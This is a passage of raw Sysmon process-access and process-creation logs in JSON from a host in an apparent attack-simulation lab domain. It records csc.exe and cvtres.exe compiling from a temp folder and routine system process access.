07:58:53.579","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BD-5F25-0000-0010C0A90600}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4486,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BD-5F25-0000-0010C0A90600}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BD-5F25-0000-0010C0A90600}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4487,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.690\r\nProcessGuid: {41C8662E-20BD-5F25-0000-0010A6AD0600}\r\nProcessId: 4452\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES6818.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\CSC94E5D8A77B394CF081D33F8E14BC063.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20BD-5F25-0000-0010C0A90600}\r\nParentProcessId: 1204\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.690","ProcessGuid":"{41C8662E-20BD-5F25-0000-0010A6AD0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES6818.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\CSC94E5D8A77B394CF081D33F8E14BC063.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20BD-5F25-0000-0010C0A90600}","ParentProcessId":"1204","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.cmdline\"","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4488,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-20BD-5F25-0000-0010C0A90600}\r\nSourceProcessId: 1204\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20BD-5F25-0000-0010A6AD0600}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-20BD-5F25-0000-0010C0A90600}","SourceProcessId":"1204","SourceThreadId":"4616","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20BD-5F25-0000-0010A6AD0600}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4489,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BD-5F25-0000-0010A6AD0600}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BD-5F25-0000-0010A6AD0600}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4490,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4491,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4492,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4493,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
